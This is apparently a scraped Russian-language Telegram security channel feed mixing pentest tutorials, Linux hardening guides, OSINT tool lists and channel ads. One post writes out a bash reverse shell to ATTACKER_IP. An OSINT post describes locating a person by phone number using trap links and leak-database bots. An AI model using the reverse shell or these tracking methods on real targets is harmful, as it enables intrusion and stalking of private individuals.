CodeGuard: CyberSec Edition

👩‍💻 Всем программистам посвящается! Вот 17 авторских обучающих IT каналов по самым востребованным областям программирования: Выбирай своё направление: 👩‍💻 Python — t.me/python_ready 🤔 InfoSec & Хакинг — t.me/hacking_ready 🖥 SQL & Базы Данных — t.me/sql_ready 🤖 Нейросети — t.me/neuro_ready 👩‍💻 C/C++ — https://t.me/cpp_ready 👩‍💻 C# & Unity — t.me/csharp_ready 👩‍💻 Java — t.me/java_ready 👩‍💻 Linux — t.me/linux_ready 🖼️ DevOps — t.me/devops_ready 📖 IT Книги — t.me/books_ready 👩‍💻 Frontend — t.me/frontend_ready 📱 JavaScript — t.me/javascript_ready 👩‍💻 Backend — t.me/backend_ready 📱 GitHub & Git — t.me/github_ready 👩‍💻 Весь IT — t.me/it_ready 👩‍💻 Bash & Shell — t.me/bash_ready 🖥 Design — t.me/design_ready 📌 Гайды, шпаргалки, задачи, ресурсы и фишки для каждого языка программирования!

🔐 Netexec для пентестеров: эксплуатация SSH На Hacking Articles показали, как пентестеры используют Netexec для проверки безопасности SSH-серверов.

Основные возможности:  
Перебор паролей и учетных записей для обнаружения слабых логинов  
Проверка валидности найденных учетных данных  
Удаленное выполнение команд для разведки системы и окружения  
Передача файлов — заливка payload и сбор данных (эксфильтрация)  

Netexec интегрирован с MITRE ATT&CK, что позволяет моделировать реальные атаки с целью выявления уязвимостей, но при этом действия остаются контролируемыми и обратимыми. Основной риск — слабые пароли и плохо настроенные SSH сервисы, открывающие путь к полному компромиссу системы.

Рекомендуется: - Использовать ключевую аутентификацию вместо паролей - Внедрять многофакторную аутентификацию (MFA) - Ограничивать доступ по IP и логировать действия - Применять защиту от brute force (fail2ban, rate limiting)

Руководство по эксплуатации SSH через Netexec поможет лучше понять риски и повысить безопасность ваших систем. 😈 CodeGuard | #security #pentest

💥 Часть 4 — Shell, которые используют плохие и хорошие парни В мире кибербезопасности shell — это не просто оболочка, а инструмент контроля. Хорошие парни используют один набор, чтобы тестировать и обеспечивать безопасность, а плохие — нередко тот же, но в злонамеренных целях. 🔹Популярные shell в Kali Linux: - Meterpreter — мощный шелл от Metasploit, который дает полный контроль над системой, позволяет выполнять команды и безопасно скрываться - Netcat (nc) — универсальный «швейцарский нож» для создания обратных и привязанных соединений, часто используется для получения удаленного доступа - Bash Reverse Shell — простой и легкий обратный шелл для быстрого доступа к целевой машине - Powershell — удобен для работы с Windows-системами, часто применяется как в атаке, так и в защите ⚠️ Почему стоит знать и понимать их? Понимание как работают эти оболочки поможет не только в атаках (при этичном хакинге), но и в обнаружении и нейтрализации вторжений в ваши сети. 🔍 Пример простого Bash reverse shell:

bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

Этот код запускает обратное соединение с атакующим, позволяя контролировать машину через командную строку. 🖥 Часть 4 в Архиве — последний пост ⭐️ CodeGuard | Chat | #pentest #kali #course

📧 Парсинг и анализ email-логов Postfix для выявления спама и фишинга Postfix — надёжный почтовый сервер, но спам и фишинг — вечная головная боль. Логи Postfix — кладезь информации, где можно найти подозрительную активность, выявить проблемы с доставкой и защитить почтовую инфраструктуру. Разберёмся, как быстро парсить логи и выделять подозрительные письма. 🔍 Чего искать в логах то? - Неудачные попытки доставки (`status=bounced`, `deferred`) - Повторяющиеся попытки отправки — признак рассылки спама - Подозрительные отправители и получатели - Ошибки аутентификации и подключения - Вирусы и фишинговые клиенты 🚀 Инструмент для парсинга: — maillog — скрипт на Perl для группировки логов по письмам, выделение успешности и ошибок с цветами. Есть фильтры по дате, отправителю, получателю. Работает с ротацией логов и сжатыми файлами. — Simple Postfix Log Analyzer — простой парсер на PHP с веб-интерфейсом для удобного анализа логов, сортировки и фильтров. 🟧 Быстрый пример парсинга с grep и awk:

grep 'postfix/' /var/log/mail.log | grep 'status=bounced'

Выведет все письма с ошибками доставки — часто это источник проблем.

⚙️ Автоматизация и хранение - Ежедневная обработка логов перед ротацией — сохраняйте нужную статистику в БД - Настройка оповещений на повторяющиеся ошибки - Анализ тем писем, IP отправителей и т.п. для выявления массированных атак

➡️ Дальнейшее чтение — подробный разбор логов и генерация отчетов Парсинг логов — лучший способ следить за почтовой системой и быть на шаг впереди злоумышленников. 😈 CodeGuard | #Postfix #emailsecurity #bash

Он тимлид в российском бигтехе! Но ещё с универа мечтает о переезде в Лондон! Он отправил уже несколько тысяч откликов на вакансии! Позади — сотни собеседований и столько же отказов 😳 Какое-то время он даже жил в лесу, чтобы ничего не отвлекало его от подготовки к интервью. Он 14 лет в ИТ: писал сервисы, менеджерил команды, ломал монолиты и собирал новые 😅 Он видел всё — и даже то, чего не стоило бы видеть. Весь свой опыт, знания и советы он публикует в своём канале, говорит простым и понятным языком. Подпишись на его канал @artur_speaking Узнай первым о том, что тебя ждёт впереди, чтобы оставить конкурентов далеко позади, добраться до самых вершин карьеры — и наказать своих врагов и завистников 💀

📍 Как узнать геолокацию человека по номеру телефона? Мы разберём реальные способы определения местоположения человека. Помни, что напрямую по номеру телефона узнать точную локацию нельзя — это доступно только операторам и правоохранительным органам. Вот готовый пост для Telegram на основе предоставленного материала: Однако есть рабочие методы, которые можно использовать, комбинируя OSINT и социальную инженерию: 🔹 Поиск аккаунтов в соцсетях по номеру телефона — можно узнать город, увлечения, круг общения. 🔹 Отсылка ссылки-ловушки с просьбой поделиться местоположением (например, через проект Storm-Breaker). 🔹 Анализ фото с геометками в соцсетях для составления карты посещаемых мест. 🔹 Получение данных о точках доступа Wi-Fi и MAC-адресах для определения приблизительного района. 🔹 Использование Telegram-ботов (Userbox, Himera Search), работающих с базами утечек — они помогут найти адрес и другую информацию, но не текущее местоположение. ⚠️ Методы исключительно в статье для информации. Пользуйтесь легальными способами и уважайте приватность 😈 CodeGuard | #OSINT

Ой-ой-ой! Куда?! Кудаа??! CodeGuard: Python — еще один новый канал?! Ты хочешь прокачать навыки программирования на Python? Тогда тебе точно сюда! В нашем новом канале — 🔹Ежедневные разборы 🔹Полезные советы и трюки 🔹Практические примеры кода 🔹Поддержка и общение ⭐️ Подписывайся CodeGuard: Python

🛡 AppArmor и SELinux: базовое сравнение и настройка безопасности Linux В системах Linux для повышения безопасности приложений применяют два основных механизма контроля доступа — AppArmor и SELinux. Оба помогают ограничивать права процессов, но делают это по-разному. ⭐️ Что выбрать? AppArmor — основа на путях к файлам, проще в настройке и чтении, стандарт для Ubuntu и Debian. SELinux — система с метками, более гибкая и комплексная, чаще используется в RHEL, CentOS и Fedora. 🔹Проверка статуса AppArmor:

sudo aa-status

Включение и запуск:

sudo systemctl enable --now apparmor

🔹 Основные команды AppArmor: - Просмотр профилей:

sudo aa-status

- Перевод в режим жалоб (Complain) для отладки:

sudo aa-complain /path/to/profile

- Включение жесткого режима (Enforce):

sudo aa-enforce /path/to/profile

- Просмотр логов для диагностики:

journalctl -e | grep apparmor

🔹 Проверка статуса SELinux:

sestatus

Изменение режима (например, включение enforce):

sudo setenforce 1

Постоянное изменение в конфиге:

sudo nano /etc/selinux/config
# Измените SELINUX=enforcing

⚙️ Пример базового скрипта для включения AppArmor и SELinux:

#!/bin/bash

sudo systemctl enable --now apparmor
sudo aa-status

sudo setenforce 1
sestatus

✅ Практические советы: - AppArmor проще и идеален для новичков или Ubuntu/Debian-систем. - SELinux требует больше обучения, зато предлагает детальный контроль доступа. - Для новых профилей используйте режим complain в AppArmor для отладки. - Читайте логи для понимания блокируемых действий и настройки разрешений. AppArmor и SELinux — ключевые инструменты для повышения защиты Linux, заставляющие процессы работать строго по правилам доступа. Начните с простого и развивайте навыки системной безопасности! 😈 CodeGuard | #AppArmor #SELinux #bash #security

⚠️ JEA + PowerShell Remoting: Принцип минимальных привилегий в проде без боли Сегодня мы поговорим о боли. О той самой боли, которая возникает в 3 часа ночи, когда звонит дежурный инженер и говорит, что «всё лежит». Веб-приложение не отвечает, а единственный способ что-то сделать — это дать ему RDP-доступ на сервер с правами локального, а то и доменного администратора. И всё это ради одной единственной задачи: перезапустить пул приложений в IIS. Знакомая ситуация? Мы даем избыточные права, потому что это быстро и просто. Мы даем «ключ от всего города», чтобы человек мог открыть одну дверь. В этот момент мы открываем ящик Пандоры: случайная ошибка, запущенный по незнанию скрипт, а в худшем случае — скомпрометированная учетная запись, которая становится для злоумышленника плацдармом для захвата всей инфраструктуры. Проблема в том, что традиционный подход к администрированию Windows-систем часто ставит нас перед ложным выбором: либо безопасность, либо операционная эффективность. Либо мы закручиваем гайки так, что никто не может работать, либо раздаем админские права направо и налево, надеясь на лучшее. Но что, если я скажу вам, что этот выбор — ложный? Что существует технология, встроенная в Windows Server, которая позволяет нам совместить гранулярную безопасность, полный аудит и удобство автоматизации? Технология, которая превращает администрирование из «искусства» в точную инженерную дисциплину. Имя ей — Just Enough Administration (JEA), и в связке с PowerShell Remoting она способна кардинально изменить ваш подход к управлению серверами.

Эта статья — не просто теоретический обзор. Это пошаговое, выстраданное на практике руководство по внедрению JEA в реальной продакшен-среде на Windows Server 2019/2022. Мы пройдем весь путь: от понимания фундаментальных принципов до создания, развертывания и использования защищенных конечных точек (endpoints), решая по пути реальные проблемы.

📖 Читать дальше 😈 CodeGuard | #Windows #PowerShell #sysadmin

👩‍💻 Безопасность ядра Linux и эксплуатация уязвимостей: полный гид с ресурсами Linux — это не просто ОС, а целый живой организм. Чтобы стать экспертом, нужно понимать слабые места и методы их обхода. Вот моя скромная подборка ресурсов, которые помогут прокачать знания в этой теме. 💀 Начните с книг и техник: - Крупнейшая коллекция книг и материалов: [Books] - Ключевые приёмы эксплуатации: [Techniques] - Как эксплуатировать уязвимости: [Exploitation] - Приёмы обхода защит: [Protection Bypasses] 👽 Уязвимости по полочкам: - Утечки информации: [Info-leaks] - Эскалация привилегий: [LPE] - Удалённое выполнение кода: [RCE] - Другие типы уязвимостей: [Other] 🔎 Как находить баги и защищать систему: - Поиск багов: [Finding Bugs] - Защитные методики: [Defensive] - Практические эксплойты: [Exploits] 🛠 Инструменты для работы: - Fuzzers и средства тестирования: [Fuzzers] - Разное полезное: [Assorted] 👾 Практика и лаборатории: - Воркшопы и курсы: [Workshops] - Задачи для CTF: [CTF Tasks] - Другие задания: [Other Tasks] - Практические площадки: [Playgrounds] - Инфраструктура для тестов: [Infrastructure] ⚙️ Погружение во внутренности ядра: - [Первые шаги после декомпрессии ядра] - [Обработка прерываний и исключений] - [Подготовка к точке входа в ядро] - [Точка входа в ядро] - [Архитектурно-зависимая инициализация] - [Продолжение архитектурно-зависимой инициализации] - [Завершающие этапы setup_arch] - [Инициализация RCU] - [Конец инициализации] 🚀 Этого список — наработки для глубокого изучения и практики. 😈 CodeGuard | #LinuxKernel #pentesting #cybersecurity

INSPECTOR | OSINT - разведка из открытых источников, поиск уязвимостей, новости из мира даркнета. Inf0 | ИБ, OSINT - канал ИБ-спеца, посвящённый информационной безопасности, техникам OSINT, защите устройств и бесплатными курсами.

📕Книга: «Внутреннее устройство Linux» (3-е изд.) Автор: Уорд Б. Год: 2022

Если хочешь глубоко понять, как устроена операционная система Linux — от ядра и системного администрирования до программирования на C и написания скриптов — эта книга будет отличным руководством. 👨‍💻 Что внутри: - Подробное изучение ядра Linux и его механизмов - Основы системного администрирования и настройки сети - Разработка программ и скриптов на C и shell - Вопросы безопасности и защиты информации - Виртуализация и эффективное управление ресурсами - Практические советы для программистов, администраторов и специалистов по безопасности Книга рекомендована всем, кто хочет изучить Linux быстро, эффективно и глубоко. 💠 Бери книгу → [Archive] 😈 CodeGuard | #book #Linux #pentest

🛡 «Нормально делай – нормально будет»: что такое Secure by Design В этой статье наши эксперты, – разбираются, что такое подход Secure by Design, является ли он волшебной таблеткой для разработчиков и ИБ-специалистов, в чем разница между Secure by Design, AppSec и DevSecOps, а также какое будущее ждет безопасную разработку.

Представьте, что мы строим город и изначально, еще на этапе проекта, ставим задачу сделать его максимально безопасным для будущих жителей: продумываем систему наблюдения, оповещения и реагирования на инциденты, проектируем широкие улицы с автономным освещением, заранее разделяем транспортные и пешеходные потоки. Такой подход, при котором безопасность закладывается в фундамент, а не добавляется постфактум в виде «заборов и камер», кардинально снижает вероятность происшествий. Именно эту философию — проектировать систему изначально безопасной, будь то город, цифровой продукт или любая сложная инфраструктура, — и олицетворяет собой концепция Secure by Design. В разработке это означает, что думать об уязвимостях, контроле доступа и защите данных важно еще до написания первой строчки кода.

Secure by Design — не просто набор практик, а философия проектирования, где безопасность закладывается в продукт на этапе замысла, а не добавляется постфактум. Однако это не волшебная таблетка, которая отменяет необходимость тестирования или мониторинга. Скорее это – их основа. 👉 Если интересно — почитайте 😈 CodeGuard | #cybersecurity

⭐️ Скрытая операционная система с VeraCrypt — Подумали, что знаете VeraCrypt досконально? Ага, ага. Каждый раз она находит новый способ удивить, доказать, что это не просто шифровальщик, а целый арт-объект кибербезопасности. Здесь нет случайностей — всё глубоко и основательно. — Как только выполните полнодисковое шифрование AES-256, дурные ребята смогут только ворошить воздух. Даже полный доступ к железу — ничто не вытащит информацию без пароля и PIM-а. Ваши логи, секреты, файлы — надежно спрятаны в криптографическом сейфе. — Но знайте: безопасность — это не только защита от взлома, но и психологический щит. При загрузке VeraCrypt просит пароль и PIM. Уже очевидно, что система зашифрована, и «привлекать лишнее внимание» — последнее, что хочется. Тогда на помощь приходит фишка хитрожопости. — Вместо стандартного ввода пароля можно вывести на экран случайный набор символов или сообщение об ошибке с рекомендацией перезагрузить компьютер. Вы можете играть с этим экраном, ориентируясь на свою фантазию и чувство юмора. Этот «фейк-запрос» настраивается в Система → Установки → Правка конфигурации загрузчика. Внимание: можно сильно «накосячить» и сделать систему неработоспособной. Так что — осторожно!

Если тема сильно зацепила, то вот материалы для глубокого погружения: ➡️ Скрытый том ➡️ Скрытая операционная система ➡️ Правдоподобное отрицание шифрования

⭐️ Официальный русскоязычный гайд Твой лайк помогает мне писать посты круче и круче 😈 CodeGuard | #VeraCrypt #AES256 #Security

INSPECTOR | OSINT - разведка из открытых источников, поиск уязвимостей, новости из мира даркнета. Inf0 | ИБ, OSINT - канал ИБ-спеца, посвящённый информационной безопасности, техникам OSINT, защите устройств и бесплатными курсами.

🔍 Использование ffuf для быстрого поиска директорий и скрытых страниц Ffuf — мощный и быстрый инструмент фаззинга для перебора URL, который помогает находить скрытые директории, файлы и параметры веб-приложений. Идеален для пентестеров и исследователей безопасности. 🚀 Шаг 1. Установка ffuf - На macOS:

brew install ffuf

- На Linux с Go (последней версии):

go install github.com/ffuf/ffuf/v2@latest

💥 Шаг 2. Поиск директорий Используйте словарь для перебора и укажите URL с ключевым словом FUZZ:

ffuf -w /path/to/wordlist.txt -u http://target.com/FUZZ

Пример со словарём SecLists:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://target.com/FUZZ

*** 🔎 Шаг 3. Поиск файлов с расширениями Добавьте опцию -e с нужными расширениями:

ffuf -w /path/to/wordlist.txt -u http://target.com/FUZZ -e .php,.html,.txt

⚙️ Шаг 4. Увеличение скорости и фильтрация Число одновременных потоков изменяется через -t:

ffuf -w wordlist.txt -u http://target.com/FUZZ -t 100

Фильтрация по статусу ответа, например показать только HTTP 200:

ffuf -w wordlist.txt -u http://target.com/FUZZ -fs 0 -fc 404

📌 Рекомендации - Используйте словари из SecLists - Не злоупотребляйте большим количеством потоков, чтобы не вызвать DoS - Тщательно фильтруйте результаты, чтобы выделить полезные URL Ffuf это мощный помощник для поиска скрытых путей и уязвимостей в веб-приложениях. Практикуйтесь с командами для быстрого старта! не забудь поставить 👍 😈 CodeGuard | #ffuf #fuzzing #websecurity #pentest

💥 Взламываем системы с Kali Linux — Часть 3 Ты уже освоил базу и научился пользоваться Kali Linux и основными инструментами? Пора перейти к реальным взломам систем! 🔹Практические кейсы: - Эксплуатация уязвимостей с помощью Metasploit - Сканирование целевых систем и выявление точек входа - Подбор паролей и тестирование устойчивости сервисов - Перехват и анализ трафика для получения чувствительной информации 🔹 Почему Kali Linux? Это самая мощная и популярная система для тестирования на проникновение. Освоив её инструменты, ты сможешь не только взламывать (этично!), но и защищать реальные инфраструктуры. 🥡 Полная Часть 3 в Архиве — последний пост ⭐️ CodeGuard | Chat | #pentest #kali #course

⭐️ Ищем человека в сети: проверенные OSINT-инструменты с прямыми ссылками OSINT — алгоритм поиска, где один email или ник может привести к целой сети профилей. Вот самые рабочие сервисы с коротким описанием и ссылками: ✉️ По email: — Emailsherlock — быстро покажет, к каким сайтам и соцсетям привязан email — Emailrep — анализ репутации email, проверка утечек и спама 🔎 По никнейму: — WhatsMyName — поиск по 280+ сервисам и соцсетям — Usersearch — глубокий поиск профилей в соцсетях и на форумах — Maigret — соберёт данные с 2300+ сайтов в одном отчёте 📞 По номеру телефона: - SpravkaRU — классический справочник с поиском по ФИО - Email2phonenumber — связывает email с номером через сервисы восстановления пароля Используйте комбинацию этих инструментов, чтобы составить полную картину цифрового следа. OSINT — это про внимательность, терпение и немного логики) Ставь лайкос, если про osint нужны посты 😈 CodeGuard | #OSINT #infosec

❗️Внимание, хакеры и разработчики! У нас для вас новость и куча задач! Канал про кибербезопасность и разработку 🐞 БАГодельня запустил сайт с CTF-задачами для вашей практики! 📌 Помимо тасков, на канале вас ждут: 🔹Регулярные посты и руководства по разработке 🔹 Подробные разборы решений и ошибок 🔹 Описания алгоритмов и подходов 🔹 Код-ревью реальных проектов Всё для вашего роста в IT можно найти тут: @bug_makers

🚀 Metasploit Framework — мощный open-source инструмент для поиска и эксплуатации уязвимостей в системах.

🔹 Доступен на GitHub 🔹 Полная документация

💡 Всегда есть поддержка в GitHub Discussions, Slack и подробные гайды. Начни изучать и практиковать Metasploit для эффективного проведения pentest-ов и оценки безопасности! 😈 CodeGuard | #Metasploit